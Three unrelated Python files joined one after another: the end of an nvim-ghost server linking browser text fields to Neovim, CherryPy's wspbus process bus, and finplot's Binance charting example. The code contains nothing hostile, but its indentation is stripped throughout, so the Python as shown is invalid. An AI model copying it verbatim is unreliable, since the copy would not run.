# Don't handle the next nvim_buf_lines_event until we're done
self.handle_neovim_notifications = False
# Save the text that we just set, so that if a nvim_buf_lines_event
# wants to send back the exact same text, we can stop it.
self.last_set_text = text
if not self.handled_first_message:
# This is the first message from the browser, and we are handling
# it right now, so mark it as handled.
self.handled_first_message = True
# Since this is the first message, it means we haven't set the
# filetype yet. So, let's set the filetype now.
neovim_handle.api.buf_set_option(buffer_handle, "filetype", filetype)
self._trigger_autocmds(url)
self.last_set_filetype = filetype
if filetype != self.last_set_filetype:
# i.e. the filetype has changed in the browser
handle = neovim_handle
buffer = buffer_handle
currently_set_filetype = handle.api.buf_get_option(buffer, "filetype")
if self.last_set_filetype == currently_set_filetype:
# user hasn't set a custom filetype
neovim_handle.api.buf_set_option(buffer_handle, "filetype", filetype)
self.last_set_filetype = filetype
self._trigger_autocmds(url)
# New connection
def connected(self):
# Create and setup the buffer
self.neovim_address = neovim_focused_address
self.neovim_handle = get_neovim_handle()
self.buffer_handle = self.neovim_handle.api.create_buf(False, True)
self.neovim_handle.api.buf_set_option(self.buffer_handle, "bufhidden", "wipe")
self.neovim_handle.command(f"tabe | {self.buffer_handle.number}buffer")
self.handle_neovim_notifications = True
self._start_neovim_listener()
# Log
print(
time.strftime("[%H:%M:%S]:"),
"Connected",
":".join([str(_) for _ in self.address]),
"to",
self.neovim_address,
)
# Add it to the records
global WEBSOCKET_PER_NEOVIM_ADDRESS
if self.neovim_address not in WEBSOCKET_PER_NEOVIM_ADDRESS:
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address] = []
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address].append(self)
# Since it's a new connection, we haven't handled the first message yet
self.handled_first_message = False
# Connection closed
def handle_close(self):
# Log
print(
time.strftime("[%H:%M:%S]:"),
":".join([str(_) for _ in self.address]),
"websocket closed",
)
# Delete buffer and stop event loop
self.neovim_handle.command(f"bdelete {self.buffer_handle.number}")
self.neovim_handle.close()
self.loop_neovim_handle.stop_loop()
self.loop_neovim_handle.close()
# Check and delete the associated records
global WEBSOCKET_PER_NEOVIM_ADDRESS
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address].remove(self)
if len(WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address]) == 0:
del WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address]
def _start_neovim_listener(self):
threading.Thread(target=self._neovim_listener, daemon=True).start()
def _neovim_listener(self):
self.loop_neovim_handle = get_neovim_handle()
self.loop_neovim_handle.subscribe("nvim_buf_lines_event")
self.loop_neovim_handle.subscribe("nvim_buf_detach_event")
self.loop_neovim_handle.api.buf_attach(self.buffer_handle, False, {})
self.loop_neovim_handle.run_loop(None, self._neovim_handler)
def _neovim_handler(self, *args):
if not self.handle_neovim_notifications:
# Resume handling notifications, because this notification has been
# triggered by the buffer changes we have done above.
self.handle_neovim_notifications = True
# Because this notification was caused by our changes, we are not
# interested in handling it. It is of zero significance to us.
return
# Fetch the event name
event = args[0]
if event == "nvim_buf_detach_event":
# Buffer has been closed by user. Close the connection.
self.close()
if event == "nvim_buf_lines_event":
# Buffer text has been changed by user.
# Get the buffer contents
handle = self.loop_neovim_handle
buffer_contents = handle.api.buf_get_lines(self.buffer_handle, 0, -1, False)
# Turn buffer_contents (a List) to a string
text = "\n".join(buffer_contents)
# Check if this is the same text we just set!
if self.last_set_text is not None:
if text == self.last_set_text:
# We are trying to send the text that we just set! Stop!
return
# Text has been changed by user.
# last_set_text is now outdated and invalid.
self.last_set_text = None
# Send the text
self._send_text(text)
def _send_text(self, text: str):
# NOTE: Just satisfying the protocol for now.
# I still don't know how to extract 'selections' from neovim
# Heck, I don't even know what this thing is supposed to do!
selections: List[Dict[str, int]] = []
selections.append({"start": 0, "end": 0})
# Construct and send the message
message = json.dumps({"text": text, "selections": selections})
self.send_message(message)
# Log
print(time.strftime("[%H:%M:%S]:"), f"{self.address[1]} sent", message)
def _trigger_autocmds(self, url: str):
self.neovim_handle.command(f"doau nvim_ghost_user_autocommands User {url}")
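# For example, with a hypothetical url of "example.com", the command above
# expands to: doau nvim_ghost_user_autocommands User example.com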
class GhostWebSocketServer(WebSocketServer):
# This is necessary because the imported WebSocketServer does not store
# its port number. Yes, I have seen the source code. It doesn't.
def __init__(self, host, port, websocketclass, **kwargs):
self.port = port
super().__init__(host, port, websocketclass, **kwargs)
class Server:
def __init__(self):
self.http_server = self._http_server()
self.websocket_server = self._websocket_server()
# Do not daemonize one of the threads. It will keep the binary running
# after the main thread has finished executing everything.
self.http_server_thread = threading.Thread(
target=self._http_server_serve_forever
)
self.websocket_server_thread = threading.Thread(
target=self.websocket_server.serve_forever,
daemon=True,
)
def _http_server(self):
if not _port_occupied(GHOST_PORT):
return HTTPServer((LOCALHOST, GHOST_PORT), GhostHTTPRequestHandler)
else:
sys.exit("Port Occupied")
def _http_server_serve_forever(self):
while True:
self.http_server.handle_request()
def _websocket_server(self):
while True:
random_port = random.randint(9000, 65535)
if not _port_occupied(random_port):
return GhostWebSocketServer(LOCALHOST, random_port, GhostWebSocket)
WEBSOCKET_PER_NEOVIM_ADDRESS: Dict[str, List[GhostWebSocket]] = {}
argparser = ArgParser()
argparser.parse_args()
# Start servers
exit_if_server_already_running()
servers = Server()
servers.http_server_thread.start()
servers.websocket_server_thread.start()
if LOGGING_ENABLED:
sys.stdout = open("stdout.log", "w", buffering=1)
sys.stderr = open("stderr.log", "w", buffering=1)
print(time.strftime("%A, %d %B %Y, %H:%M:%S"))
print(f"$NVIM_LISTEN_ADDRESS: {neovim_focused_address}")
print(f"binary {BUILD_VERSION}")
print("Servers started")
if neovim_focused_address is not None:
with pynvim.attach("socket", path=neovim_focused_address) as nvim_handle:
if not SUPER_QUIET:
nvim_handle.command("echom '[nvim-ghost] Servers started'")
store_port()
def stop_servers():
os.remove(TEMP_FILEPATH) # Remove port
print("Exiting...")
sys.exit()
def _signal_handler(_signal, _):
_signal_name = signal.Signals(_signal).name
print(time.strftime("[%H:%M:%S]:"), f"Caught: {_signal_name}")
if _signal in (signal.SIGINT, signal.SIGTERM):
stop_servers()
signal.signal(signal.SIGINT, _signal_handler)
signal.signal(signal.SIGTERM, _signal_handler)
# vim: et ts=4 sw=4 sts=4
|
wspbus.py
|
r"""An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a
framework-neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.::
                        O
                        |
                        V
       STOPPING --> STOPPED --> EXITING -> X
          A   A         |
          |    \___     |
          |        \    |
          |         V   V
        STARTED <-- STARTING
"""
import atexit
try:
import ctypes
except ImportError:
"""Google AppEngine is shipped without ctypes
:seealso: http://stackoverflow.com/a/6523777/70170
"""
ctypes = None
import operator
import os
import sys
import threading
import time
import traceback as _traceback
import warnings
import subprocess
import functools
import six
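# Illustrative sketch (comment only, so nothing runs at import time) of the
# pub/sub flow described in the module docstring, using the Bus class defined
# below. The channel and listener are examples:
#
#     bus = Bus()
#     bus.subscribe('start', lambda: print('site starting'))
#     bus.start()   # STOPPED -> STARTING -> STARTED, publishes 'start'
#     bus.exit()    # publishes 'stop' and 'exit', ends in the EXITING state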
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
"""Exception raised during errors on Bus.publish()."""
delimiter = '\n'
def __init__(self, *args, **kwargs):
"""Initialize ChannelFailures errors wrapper."""
super(ChannelFailures, self).__init__(*args, **kwargs)
self._exceptions = list()
def handle_exception(self):
"""Append the current exception to self."""
self._exceptions.append(sys.exc_info()[1])
def get_instances(self):
"""Return a list of seen exception instances."""
return self._exceptions[:]
def __str__(self):
"""Render the list of errors, which happened in channel."""
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
__repr__ = __str__
def __bool__(self):
"""Determine whether any error happened in channel."""
return bool(self._exceptions)
__nonzero__ = __bool__
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return 'states.%s' % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
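# Because _StateEnum.__setattr__ stores the attribute name on each State
# instance, e.g. repr(states.STARTED) evaluates to 'states.STARTED'.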
try:
import fcntl
except ImportError:
max_files = 0
else:
try:
max_files = os.sysconf('SC_OPEN_MAX')
except AttributeError:
max_files = 1024
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
max_cloexec_files = max_files
def __init__(self):
"""Initialize pub/sub bus."""
self.execv = False
self.state = states.STOPPED
channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main'
self.listeners = dict(
(channel, set())
for channel in channels
)
self._priorities = {}
def subscribe(self, channel, callback=None, priority=None):
"""Add the given callback at the given channel (if not present).
If callback is None, return a partial suitable for decorating
the callback.
"""
if callback is None:
return functools.partial(
self.subscribe,
channel,
priority=priority,
)
ch_listeners = self.listeners.setdefault(channel, set())
ch_listeners.add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
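# Illustrative sketch (comment only): calling subscribe() without a
# callback returns a partial, so it can also be used as a decorator.
# The bus instance and channel below are examples:
#
#     @bus.subscribe('graceful')
#     def reload_config():
#         ...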
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
raw_items = (
(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]
)
items = sorted(raw_items, key=operator.itemgetter(0))
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit:
e = sys.exc_info()[1]
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except Exception:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log('Error in %r listener %r' % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""Assert that the Bus is not running in atexit handler callback."""
if self.state != states.EXITING:
warnings.warn(
'The main thread is exiting, but the Bus is in the %r state; '
'shutting it down automatically now. You must either call '
'bus.block() after start(), or call bus.exit() before the '
'main thread exits.' % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.log('Shutting down due to error in start listener:',
level=40, traceback=True)
e_info = sys.exc_info()[1]
try:
self.exit()
except Exception:
# Any stop/exit errors will be logged inside publish().
pass
# Re-raise the original error
raise e_info
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
EX_SOFTWARE = 70
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except Exception:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(EX_SOFTWARE)
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
# process, so we just call os._exit here.
os._exit(EX_SOFTWARE)
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See https://github.com/cherrypy/cherrypy/issues/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See https://github.com/cherrypy/cherrypy/issues/751.
self.log('Waiting for child threads to terminate...')
for t in threading.enumerate():
# Validate that we're not trying to join the MainThread, which
# would cause a deadlock. This can happen when running as a
# Windows service, or in any other case where another thread
# executes cherrypy.engine.exit()
if (
t != threading.currentThread() and
not isinstance(t, threading._MainThread) and
# Note that any dummy (external) threads are
# always daemonic.
not t.daemon
):
self.log('Waiting for thread %s.' % t.getName())
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Poll for the given state(s) at intervals; publish to channel."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
while self.state not in states:
time.sleep(interval)
self.publish(channel)
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
try:
args = self._get_true_argv()
except NotImplementedError:
"""It's probably win32 or GAE"""
args = [sys.executable] + self._get_interpreter_argv() + sys.argv
self.log('Re-spawning %s' % ' '.join(args))
self._extend_pythonpath(os.environ)
if sys.platform[:4] == 'java':
from _systemrestart import SystemRestart
raise SystemRestart
else:
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
if self.max_cloexec_files:
self._set_cloexec()
os.execv(sys.executable, args)
@staticmethod
def _get_interpreter_argv():
"""Retrieve current Python interpreter's arguments.
Returns empty tuple in case of frozen mode, uses built-in arguments
reproduction function otherwise.
Frozen mode is possible when the app has been packaged into a binary
executable using py2exe. In this case the interpreter's arguments are
already built into that executable.
:seealso: https://github.com/cherrypy/cherrypy/issues/1526
Ref: https://pythonhosted.org/PyInstaller/runtime-information.html
"""
return ([]
if getattr(sys, 'frozen', False)
else subprocess._args_from_interpreter_flags())
@staticmethod
def _get_true_argv():
"""Retrieve all real arguments of the python interpreter.
...even those not listed in ``sys.argv``
:seealso: http://stackoverflow.com/a/28338254/595220
:seealso: http://stackoverflow.com/a/6683222/595220
:seealso: http://stackoverflow.com/a/28414807/595220
"""
try:
char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p
argv = ctypes.POINTER(char_p)()
argc = ctypes.c_int()
ctypes.pythonapi.Py_GetArgcArgv(
ctypes.byref(argc),
ctypes.byref(argv),
)
_argv = argv[:argc.value]
# The code below tries to correctly handle special cases.
# When Python itself interprets `-c`, the argument that followed it shows
# up in the raw argv as `-c` as well; the same applies to `-m`. This
# snippet tries to survive at least the `-m` case.
# Ref: https://github.com/cherrypy/cherrypy/issues/1545
# Ref: python/cpython@418baf9
argv_len, is_command, is_module = len(_argv), False, False
try:
m_ind = _argv.index('-m')
if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'):
"""
In some older Python versions `-m`'s argument may be
substituted with `-c`, not `-m`
"""
is_module = True
except (IndexError, ValueError):
m_ind = None
try:
c_ind = _argv.index('-c')
if c_ind < argv_len - 1 and _argv[c_ind + 1] == '-c':
is_command = True
except (IndexError, ValueError):
c_ind = None
if is_module:
"""The arguments contain a `-m -m` sequence"""
if is_command and c_ind < m_ind:
"""There's `-c -c` before `-m`"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. Ref: "
'https://github.com/cherrypy/cherrypy/issues/1545')
# Survive module argument here
original_module = sys.argv[0]
if not os.access(original_module, os.R_OK):
"""The module doesn't exist or isn't readable by the current user"""
raise AttributeError(
"{} doesn't seem to be a module "
'accessible by current user'.format(original_module))
del _argv[m_ind:m_ind + 2] # remove `-m -m`
# ... and substitute it with the original module path:
_argv.insert(m_ind, original_module)
elif is_command:
"""The arguments contain just a `-c -c` sequence"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. "
'Ref: https://github.com/cherrypy/cherrypy/issues/1545')
except AttributeError:
"""It looks like Py_GetArgcArgv is completely absent in some environments.
It is known that there's no Py_GetArgcArgv on MS Windows and
``ctypes`` module is completely absent in Google AppEngine
:seealso: https://github.com/cherrypy/cherrypy/issues/1506
:seealso: https://github.com/cherrypy/cherrypy/issues/1512
:ref: http://bit.ly/2gK6bXK
"""
raise NotImplementedError
else:
return _argv
@staticmethod
def _extend_pythonpath(env):
"""Prepend current working dir to PYTHONPATH environment variable if needed.
If sys.path[0] is an empty string, the interpreter was likely
invoked with -m and the effective path is about to change on
re-exec. Add the current directory to $PYTHONPATH to ensure
that the new process sees the same path.
This issue cannot be addressed in the general case because
Python cannot reliably reconstruct the
original command line (http://bugs.python.org/issue14208).
(This idea filched from tornado.autoreload)
"""
path_prefix = '.' + os.pathsep
existing_path = env.get('PYTHONPATH', '')
needs_patch = (
sys.path[0] == '' and
not existing_path.startswith(path_prefix)
)
if needs_patch:
env['PYTHONPATH'] = path_prefix + existing_path
def _set_cloexec(self):
"""Set the CLOEXEC flag on all open files (except stdin/out/err).
If self.max_cloexec_files is an integer (the default), then on
platforms which support it, it represents the max open files setting
for the operating system. This function will be called just before
the process is restarted via os.execv() to prevent open files
from persisting into the new process.
Set self.max_cloexec_files to 0 to disable this behavior.
"""
for fd in range(3, self.max_cloexec_files): # skip stdin/out/err
try:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg='', level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info()))
self.publish('log', msg, level)
bus = Bus()
|
complicated.py
|
#!/usr/bin/env python3
'''A lengthy example that shows some more complex uses of finplot:
- control panel in PyQt
- varying indicators, intervals and layout
- toggle dark mode
- price line
- real-time updates via websocket
This example includes dipping into the internals of finplot and
the underlying lib pyqtgraph, which are not part of the API per se,
and may thus change in the future. If that happens, this example
will be updated to reflect such changes.
Also included are some third-party libraries to make the example
more realistic.
'''
import finplot as fplt
from functools import lru_cache
import json
from math import nan
import pandas as pd
from PyQt5.QtWidgets import QComboBox, QCheckBox, QWidget
from pyqtgraph import QtGui
import pyqtgraph as pg
import requests
from time import time as now, sleep
from threading import Thread
import websocket
class BinanceFutureWebsocket:
def __init__(self):
self.url = 'wss://fstream.binance.com/stream'
self.symbol = None
self.interval = None
self.ws = None
self.df = None
def reconnect(self, symbol, interval, df):
'''Connect and subscribe, if not already done.'''
self.df = df
if symbol.lower() == self.symbol and self.interval == interval:
return
self.symbol = symbol.lower()
self.interval = interval
self.thread_connect = Thread(target=self._thread_connect)
self.thread_connect.daemon = True
self.thread_connect.start()
def close(self, reset_symbol=True):
if reset_symbol:
self.symbol = None
if self.ws:
self.ws.close()
self.ws = None
def _thread_connect(self):
self.close(reset_symbol=False)
print('websocket connecting to %s...' % self.url)
self.ws = websocket.WebSocketApp(self.url, on_message=self.on_message, on_error=self.on_error)
self.thread_io = Thread(target=self.ws.run_forever)
self.thread_io.daemon = True
self.thread_io.start()
for _ in range(100):
if self.ws.sock and self.ws.sock.connected:
break
sleep(0.1)
else:
self.close()
raise websocket.WebSocketTimeoutException('websocket connection failed')
self.subscribe(self.symbol, self.interval)
print('websocket connected')
def subscribe(self, symbol, interval):
try:
data = '{"method":"SUBSCRIBE","params":["%s@kline_%s"],"id":1}' % (symbol, interval)
self.ws.send(data)
except Exception as e:
print('websocket subscribe error:', type(e), e)
raise e
def on_message(self, msg):
df = self.df
if df is None:
return
msg = json.loads(msg)
if 'stream' not in msg:
return
stream = msg['stream']
if '@kline_' in stream:
k = msg['data']['k']
t = k['t']
t0 = int(df.index[-2].timestamp()) * 1000
t1 = int(df.index[-1].timestamp()) * 1000
t2 = t1 + (t1-t0)
if t < t2:
# update last candle
i = df.index[-1]
df.loc[i, 'Close'] = float(k['c'])
df.loc[i, 'High'] = max(df.loc[i, 'High'], float(k['h']))
df.loc[i, 'Low'] = min(df.loc[i, 'Low'], float(k['l']))
df.loc[i, 'Volume'] = float(k['v'])
else:
# create a new candle
data = [t] + [float(k[i]) for i in ['o','c','h','l','v']]
candle = pd.DataFrame([data], columns='Time Open Close High Low Volume'.split()).astype({'Time':'datetime64[ms]'})
candle.set_index('Time', inplace=True)
self.df = df.append(candle)
def on_error(self, error):
print('websocket error: %s' % error)
def do_load_price_history(symbol, interval):
url = 'https://www.binance.com/fapi/v1/klines?symbol=%s&interval=%s&limit=%s' % (symbol, interval, 1000)
print('loading binance future %s %s' % (symbol, interval))
d = requests.get(url).json()
df = pd.DataFrame(d, columns='Time Open High Low Close Volume a b c d e f'.split())
df = df.astype({'Time':'datetime64[ms]', 'Open':float, 'High':float, 'Low':float, 'Close':float, 'Volume':float})
return df.set_index('Time')
@lru_cache(maxsize=5)
def cache_load_price_history(symbol, interval):
'''Stupid caching, but works sometimes.'''
return do_load_price_history(symbol, interval)
def load_price_history(symbol, interval):
'''Use the memoized data, and if it is too old simply reload it.'''
df = cache_load_price_history(symbol, interval)
# check if cache's newest candle is current
t0 = df.index[-2].timestamp()
t1 = df.index[-1].timestamp()
t2 = t1 + (t1 - t0)
if now() >= t2:
df = do_load_price_history(symbol, interval)
return df
def calc_parabolic_sar(df, af=0.2, steps=10):
up = True
sars = [nan] * len(df)
sar = ep_lo = df.Low.iloc[0]
ep = ep_hi = df.High.iloc[0]
aaf = af
aaf_step = aaf / steps
af = 0
for i,(hi,lo) in enumerate(zip(df.High, df.Low)):
# parabolic sar formula:
sar = sar + af * (ep - sar)
# handle new extreme points
if hi > ep_hi:
ep_hi = hi
if up:
ep = ep_hi
af = min(aaf, af+aaf_step)
elif lo < ep_lo:
ep_lo = lo
if not up:
ep = ep_lo
af = min(aaf, af+aaf_step)
# handle switch
if up:
if lo < sar:
up = not up
sar = ep_hi
ep = ep_lo = lo
af = 0
else:
if hi > sar:
up = not up
sar = ep_lo
ep = ep_hi = hi
af = 0
sars[i] = sar
df['sar'] = sars
return df['sar']
def calc_rsi(price, n=14, ax=None):
diff = price.diff().values
gains = diff
losses = -diff
gains[~(gains>0)] = 0.0
losses[~(losses>0)] = 1e-10 # we don't want divide by zero/NaN
m = (n-1) / n
ni = 1 / n
g = gains[n] = gains[:n].mean()
l = losses[n] = losses[:n].mean()
gains[:n] = losses[:n] = nan
for i,v in enumerate(gains[n:],n):
g = gains[i] = ni*v + m*g
for i,v in enumerate(losses[n:],n):
l = losses[i] = ni*v + m*l
rs = gains / losses
rsi = 100 - (100/(1+rs))
return rsi
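# For reference, the loop above applies Wilder-style smoothing,
# avg_t = (1/n)*x_t + ((n-1)/n)*avg_(t-1), and the result is
# RSI = 100 - 100/(1 + avg_gain/avg_loss).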
def calc_stochastic_oscillator(df, n=14, m=3, smooth=3):
lo = df.Low.rolling(n).min()
hi = df.High.rolling(n).max()
k = 100 * (df.Close-lo) / (hi-lo)
d = k.rolling(m).mean()
return k, d
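# For reference, the function above computes the classic stochastic
# oscillator: %K = 100*(Close - lowest Low over n)/(highest High over n -
# lowest Low over n), and %D is the m-period simple moving average of %K.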
def calc_plot_data(df, indicators):
'''Returns data for all plots and for the price line.'''
price = df['Open Close High Low'.split()]
volume = df['Open Close Volume'.split()]
ma50 = ma200 = vema24 = sar = rsi = stoch = stoch_s = None
if 'few' in indicators or 'moar' in indicators:
ma50 = price.Close.rolling(50).mean()
ma200 = price.Close.rolling(200).mean()
vema24 = volume.Volume.ewm(span=24).mean()
if 'moar' in indicators:
sar = calc_parabolic_sar(df)
rsi = calc_rsi(df.Close)
stoch,stoch_s = calc_stochastic_oscillator(df)
plot_data = dict(price=price, volume=volume, ma50=ma50, ma200=ma200, vema24=vema24, sar=sar, rsi=rsi, \
stoch=stoch, stoch_s=stoch_s)
# for price line
last_close = price.iloc[-1].Close
last_col = fplt.candle_bull_color if last_close > price.iloc[-2].Close else fplt.candle_bear_color
price_data = dict(last_close=last_close, last_col=last_col)
return plot_data, price_data
def realtime_update_plot():
'''Called at regular intervals by a timer.'''
if ws.df is None:
return
# calculate the new plot data
indicators = ctrl_panel.indicators.currentText().lower()
data,price_data = calc_plot_data(ws.df, indicators)
# first update all data, then graphics (for zoom rigidity)
for k in data:
if data[k] is not None:
plots[k].update_data(data[k], gfx=False)
for k in data:
if data[k] is not None:
plots[k].update_gfx()
# place and color price line
ax.price_line.setPos(price_data['last_close'])
ax.price_line.pen.setColor(pg.mkColor(price_data['last_col']))
def change_asset(*args, **kwargs):
'''Resets and recalculates everything, and plots for the first time.'''
# save window zoom position before resetting
fplt._savewindata(fplt.windows[0])
symbol = ctrl_panel.symbol.currentText()
interval = ctrl_panel.interval.currentText()
ws.df = None
df = load_price_history(symbol, interval=interval)
ws.reconnect(symbol, interval, df)
# remove any previous plots
ax.reset()
axo.reset()
ax_rsi.reset()
# calculate plot data
indicators = ctrl_panel.indicators.currentText().lower()
data,price_data = calc_plot_data(df, indicators)
# some space for legend
ctrl_panel.move(100 if 'clean' in indicators else 200, 0)
# plot data
global plots
plots = {}
plots['price'] = fplt.candlestick_ochl(data['price'], ax=ax)
plots['volume'] = fplt.volume_ocv(data['volume'], ax=axo)
if data['ma50'] is not None:
plots['ma50'] = fplt.plot(data['ma50'], legend='MA-50', ax=ax)
plots['ma200'] = fplt.plot(data['ma200'], legend='MA-200', ax=ax)
plots['vema24'] = fplt.plot(data['vema24'], color=4, legend='V-EMA-24', ax=axo)
if data['rsi'] is not None:
ax.set_visible(xaxis=False)
ax_rsi.show()
fplt.set_y_range(0, 100, ax=ax_rsi)
fplt.add_band(30, 70, color='#6335', ax=ax_rsi)
plots['sar'] = fplt.plot(data['sar'], color='#55a', style='+', width=0.6, legend='SAR', ax=ax)
plots['rsi'] = fplt.plot(data['rsi'], legend='RSI', ax=ax_rsi)
plots['stoch'] = fplt.plot(data['stoch'], color='#880', legend='Stoch', ax=ax_rsi)
plots['stoch_s'] = fplt.plot(data['stoch_s'], color='#650', ax=ax_rsi)
else:
ax.set_visible(xaxis=True)
ax_rsi.hide()
# price line
ax.price_line = pg.InfiniteLine(angle=0, movable=False, pen=fplt._makepen(fplt.candle_bull_body_color, style='.'))
ax.price_line.setPos(price_data['last_close'])
ax.price_line.pen.setColor(pg.mkColor(price_data['last_col']))
ax.addItem(ax.price_line, ignoreBounds=True)
# restores saved zoom position, if in range
fplt.refresh()
def dark_mode_toggle(dark):
'''Digs into the internals of finplot and pyqtgraph to change the colors of existing
plots, axes, backgrounds, etc.'''
# first set the colors we'll be using
if dark:
fplt.foreground = '#777'
fplt.background = '#090c0e'
fplt.candle_bull_color = fplt.candle_bull_body_color = '#0b0'
fplt.candle_bear_color = '#a23'
volume_transparency = '6'
else:
fplt.foreground = '#444'
fplt.background = fplt.candle_bull_body_color = '#fff'
fplt.candle_bull_color = '#380'
fplt.candle_bear_color = '#c50'
volume_transparency = 'c'
fplt.volume_bull_color = fplt.volume_bull_body_color = fplt.candle_bull_color + volume_transparency
fplt.volume_bear_color = fplt.candle_bear_color + volume_transparency
fplt.cross_hair_color = fplt.foreground+'8'
fplt.draw_line_color = '#888'
